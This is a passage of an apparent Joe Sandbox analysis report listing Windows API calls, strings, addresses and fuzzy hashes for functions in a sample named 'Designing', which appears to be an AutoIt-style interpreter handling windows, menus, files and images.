                                              • DestroyWindow.USER32(00000000,?), ref: 00BBA8F8
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BBA972
                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BBA994
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BBA9A7
                                              • DestroyWindow.USER32(00000000), ref: 00BBA9C9
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B30000,00000000), ref: 00BBAA00
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BBAA19
                                              • GetDesktopWindow.USER32 ref: 00BBAA32
                                              • GetWindowRect.USER32(00000000), ref: 00BBAA39
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BBAA51
                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BBAA69
                                                • Part of subcall function 00B329AB: GetWindowLongW.USER32(?,000000EB), ref: 00B329BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                              • String ID: 0$tooltips_class32
                                              • API String ID: 1297703922-3619404913
                                              • Opcode ID: 6471ccfa2e2e103c83560d18964561d645241e3e822edda8acae09fa363743d0
                                              • Instruction ID: 99a79eb3c8bd841d747c2bedafa81777f54137cb2a0ed975b4a47dc87461f2d6
                                              • Opcode Fuzzy Hash: 6471ccfa2e2e103c83560d18964561d645241e3e822edda8acae09fa363743d0
                                              • Instruction Fuzzy Hash: FD717871554204AFD721DF28CC49FBB7BE5EB88304F04069DF986972A1DBB0A906DB62
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • DragQueryPoint.SHELL32(?,?), ref: 00BBCCCF
                                                • Part of subcall function 00BBB1A9: ClientToScreen.USER32(?,?), ref: 00BBB1D2
                                                • Part of subcall function 00BBB1A9: GetWindowRect.USER32(?,?), ref: 00BBB248
                                                • Part of subcall function 00BBB1A9: PtInRect.USER32(?,?,00BBC6BC), ref: 00BBB258
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00BBCD38
                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BBCD43
                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BBCD66
                                              • _wcscat.LIBCMT ref: 00BBCD96
                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BBCDAD
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00BBCDC6
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00BBCDDD
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00BBCDFF
                                              • DragFinish.SHELL32(?), ref: 00BBCE06
                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00BBCEF9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                              • API String ID: 169749273-3440237614
                                              • Opcode ID: ae80a46039a07f1d3925878f570baceb965fc57b862e987dc4f63e2a20cb6702
                                              • Instruction ID: 6847470460ef760ef836f9fef6d246e5c1569d522bea34f3b7a3d2739b1da49a
                                              • Opcode Fuzzy Hash: ae80a46039a07f1d3925878f570baceb965fc57b862e987dc4f63e2a20cb6702
                                              • Instruction Fuzzy Hash: 3E614A71508301AFC701EF54DC85DAFBBE8EF88750F100AADF595972A1DB70AA49CB62
                                              APIs
                                              • VariantInit.OLEAUT32(00000000), ref: 00B9831A
                                              • VariantCopy.OLEAUT32(00000000,?), ref: 00B98323
                                              • VariantClear.OLEAUT32(00000000), ref: 00B9832F
                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B9841D
                                              • __swprintf.LIBCMT ref: 00B9844D
                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00B98479
                                              • VariantInit.OLEAUT32(?), ref: 00B9852A
                                              • SysFreeString.OLEAUT32(?), ref: 00B985BE
                                              • VariantClear.OLEAUT32(?), ref: 00B98618
                                              • VariantClear.OLEAUT32(?), ref: 00B98627
                                              • VariantInit.OLEAUT32(00000000), ref: 00B98665
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                              • API String ID: 3730832054-3931177956
                                              • Opcode ID: af46c0ede3ab4a38dea45470170b8ee13d67506f54566d72b44850fcaad27c52
                                              • Instruction ID: c7b7091b9f9e37f2c3327344a9e8aa1ad32ae230d12d77485b9e7ac8545693d1
                                              • Opcode Fuzzy Hash: af46c0ede3ab4a38dea45470170b8ee13d67506f54566d72b44850fcaad27c52
                                              • Instruction Fuzzy Hash: 34D1AB31A08515EBCF20AF65C884B6EB7F4EF06B00F2485E5F4099B281DF34A844DBA4
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00BB4A61
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BB4AAC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                              • API String ID: 3974292440-4258414348
                                              • Opcode ID: d27c575c94fc49d4e4bc0215dae8632fdb47f01b4bf611ee934da4d13da03744
                                              • Instruction ID: 6ae30fa772ba3ff558c13217aecd4f3d2107093065810356320c9889839b0d27
                                              • Opcode Fuzzy Hash: d27c575c94fc49d4e4bc0215dae8632fdb47f01b4bf611ee934da4d13da03744
                                              • Instruction Fuzzy Hash: 87915A352046019BCB14EF20C491AAAB7E1FF94354F1088E9F8965B3A3CB71FD4ACB81
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BBBF26
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00BB97E7), ref: 00BBBF82
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BBBFBB
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00BBBFFE
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BBC035
                                              • FreeLibrary.KERNEL32(?), ref: 00BBC041
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BBC051
                                              • DestroyIcon.USER32(?,?,?,?,?,00BB97E7), ref: 00BBC060
                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BBC07D
                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BBC089
                                                • Part of subcall function 00B5312D: __wcsicmp_l.LIBCMT ref: 00B531B6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                              • String ID: .dll$.exe$.icl
                                              • API String ID: 1212759294-1154884017
                                              • Opcode ID: b8c478ebcce881cb138dfd34c6a8e852904916e4f2875f6dd73ec324e48ccecd
                                              • Instruction ID: a8067d0f6aa4935c43f56a6f5af2b8760581c88971eddeba1dc06ca5271b1f33
                                              • Opcode Fuzzy Hash: b8c478ebcce881cb138dfd34c6a8e852904916e4f2875f6dd73ec324e48ccecd
                                              • Instruction Fuzzy Hash: 1461BD71500618FBEB14EF64DC81FFA7BE8EB08711F104295F915D61D0DBB4AA90CBA0
                                              APIs
                                              • GetLocalTime.KERNEL32(?), ref: 00B9E31F
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B9E32F
                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B9E33B
                                              • __wsplitpath.LIBCMT ref: 00B9E399
                                              • _wcscat.LIBCMT ref: 00B9E3B1
                                              • _wcscat.LIBCMT ref: 00B9E3C3
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B9E3D8
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9E3EC
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9E41E
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9E43F
                                              • _wcscpy.LIBCMT ref: 00B9E44B
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B9E48A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                              • String ID: *.*
                                              • API String ID: 3566783562-438819550
                                              • Opcode ID: 7e8e163cf72ddb99fa919bd9b95eaf8e3ee9e78b0535cdb20417b49997f83350
                                              • Instruction ID: ab235cd46e11591faf3b41cd46031527feec1f318fef2997db070f3c4a010634
                                              • Opcode Fuzzy Hash: 7e8e163cf72ddb99fa919bd9b95eaf8e3ee9e78b0535cdb20417b49997f83350
                                              • Instruction Fuzzy Hash: FC6147725043459FCB10EF60D884E9EB3E8FF89314F0489AEF99987251DB35E945CB92
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B9A2C2
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B9A2E3
                                              • __swprintf.LIBCMT ref: 00B9A33C
                                              • __swprintf.LIBCMT ref: 00B9A355
                                              • _wprintf.LIBCMT ref: 00B9A3FC
                                              • _wprintf.LIBCMT ref: 00B9A41A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 311963372-3080491070
                                              • Opcode ID: a467d964ed7d5995f9d83ea65168f6a01163d762d3973074e2973c696c328e79
                                              • Instruction ID: 614fc2d75862cf7a3b3f478c035107164ad7da60bc33dbc8a2ea30341e1df09e
                                              • Opcode Fuzzy Hash: a467d964ed7d5995f9d83ea65168f6a01163d762d3973074e2973c696c328e79
                                              • Instruction Fuzzy Hash: 64516A71D00109AACF14EBE4CD46EEEB7F8AF04340F1045E5F505A21A2EB352F99EBA1
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00B7F8B8,00000001,0000138C,00000001,00000000,00000001,?,00BA3FF9,00000000), ref: 00B9009A
                                              • LoadStringW.USER32(00000000,?,00B7F8B8,00000001), ref: 00B900A3
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              • GetModuleHandleW.KERNEL32(00000000,00BF7310,?,00000FFF,?,?,00B7F8B8,00000001,0000138C,00000001,00000000,00000001,?,00BA3FF9,00000000,00000001), ref: 00B900C5
                                              • LoadStringW.USER32(00000000,?,00B7F8B8,00000001), ref: 00B900C8
                                              • __swprintf.LIBCMT ref: 00B90118
                                              • __swprintf.LIBCMT ref: 00B90129
                                              • _wprintf.LIBCMT ref: 00B901D2
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B901E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                              • API String ID: 984253442-2268648507
                                              • Opcode ID: fd4b226ff06272e2c59a79406d6fec8ebb3280268f2b199119c99c5d7f642395
                                              • Instruction ID: 42d55dcfb93495721a41d3394824f373dd058970d122b84f79a5e187be2be3d3
                                              • Opcode Fuzzy Hash: fd4b226ff06272e2c59a79406d6fec8ebb3280268f2b199119c99c5d7f642395
                                              • Instruction Fuzzy Hash: 02413A72C00119AACF14FBE4CD96EEEB7BCAF14341F5005A5F505B2092DA256F89DA61
                                              APIs
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • CharLowerBuffW.USER32(?,?), ref: 00B9AA0E
                                              • GetDriveTypeW.KERNEL32 ref: 00B9AA5B
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B9AAA3
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B9AADA
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B9AB08
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                              • API String ID: 2698844021-4113822522
                                              • Opcode ID: b63ffb31421068f93d280c171511c572aabe1782c64ddf9fe39a2bbbb679ea9d
                                              • Instruction ID: 5f011a66f00367193d9982f6ed8b1b3371b4b33e48bb1d2507003513a0b262ad
                                              • Opcode Fuzzy Hash: b63ffb31421068f93d280c171511c572aabe1782c64ddf9fe39a2bbbb679ea9d
                                              • Instruction Fuzzy Hash: 7A518A715043059FC700EF14C881D6AB7F8FF98358F1089ADF896972A1DB31AE0ACB92
                                              APIs
                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B9A852
                                              • __swprintf.LIBCMT ref: 00B9A874
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B9A8B1
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B9A8D6
                                              • _memset.LIBCMT ref: 00B9A8F5
                                              • _wcsncpy.LIBCMT ref: 00B9A931
                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B9A966
                                              • CloseHandle.KERNEL32(00000000), ref: 00B9A971
                                              • RemoveDirectoryW.KERNEL32(?), ref: 00B9A97A
                                              • CloseHandle.KERNEL32(00000000), ref: 00B9A984
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                              • String ID: :$\$\??\%s
                                              • API String ID: 2733774712-3457252023
                                              • Opcode ID: a2a573bb1f6c685b7b2211445a911f91263ea7b7190aae5d347fbadd306ca4c0
                                              • Instruction ID: 8a99dce0c9017c06d39f9bb04de527cbb2069add856d1950a4ea5746e26e0d2e
                                              • Opcode Fuzzy Hash: a2a573bb1f6c685b7b2211445a911f91263ea7b7190aae5d347fbadd306ca4c0
                                              • Instruction Fuzzy Hash: 9131C17251021AABDB219FA4DC49FEB73FCEF89701F1041F6F908D61A0EB7096448B65
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00BB982C,?,?), ref: 00BBC0C8
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC0DF
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC0EA
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC0F7
                                              • GlobalLock.KERNEL32(00000000,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC100
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC10F
                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC118
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC11F
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BB982C,?,?,00000000,?), ref: 00BBC130
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BC3C7C,?), ref: 00BBC149
                                              • GlobalFree.KERNEL32(00000000), ref: 00BBC159
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00BBC17D
                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00BBC1A8
                                              • DeleteObject.GDI32(00000000), ref: 00BBC1D0
                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BBC1E6
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                              • String ID:
                                              • API String ID: 3840717409-0
                                              • Opcode ID: feaa8492d03f1f2d0d38791f16994bbf6f9841f40e88f27dae028d5fea62b079
                                              • Instruction ID: 9e6e03aa4e88202feb27365f57edf508fdc38caf0f7c26120c9113994db1aecf
                                              • Opcode Fuzzy Hash: feaa8492d03f1f2d0d38791f16994bbf6f9841f40e88f27dae028d5fea62b079
                                              • Instruction Fuzzy Hash: DB412975600208EFDB21EF65DC88EAFBBB8EF89711F108058F905EB260DB709941DB60
                                              APIs
                                              • __wsplitpath.LIBCMT ref: 00B9E053
                                              • _wcscat.LIBCMT ref: 00B9E06B
                                              • _wcscat.LIBCMT ref: 00B9E07D
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B9E092
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9E0A6
                                              • GetFileAttributesW.KERNEL32(?), ref: 00B9E0BE
                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B9E0D8
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9E0EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                              • String ID: *.*
                                              • API String ID: 34673085-438819550
                                              • Opcode ID: 67db104163ef52ef178529e7fa0ce1d2b7cf3baee0a6531396775a682a3475d7
                                              • Instruction ID: 7c48ab1b91aac4147aa2c8b5ef232cecc02d6bf2a17d81c2a5af8239b15b3c39
                                              • Opcode Fuzzy Hash: 67db104163ef52ef178529e7fa0ce1d2b7cf3baee0a6531396775a682a3475d7
                                              • Instruction Fuzzy Hash: 0C8191715043419FCB24EF25C885A6AB7E8EF99310F1888BEF88AD7250E734ED44CB52
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BBC8A4
                                              • GetFocus.USER32 ref: 00BBC8B4
                                              • GetDlgCtrlID.USER32(00000000), ref: 00BBC8BF
                                              • _memset.LIBCMT ref: 00BBC9EA
                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00BBCA15
                                              • GetMenuItemCount.USER32(?), ref: 00BBCA35
                                              • GetMenuItemID.USER32(?,00000000), ref: 00BBCA48
                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00BBCA7C
                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00BBCAC4
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BBCAFC
                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00BBCB31
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                              • String ID: 0
                                              • API String ID: 1296962147-4108050209
                                              • Opcode ID: 5f9c176dc7b9e523ca099014581e339f3f60823068c553e105a232a35ecc9540
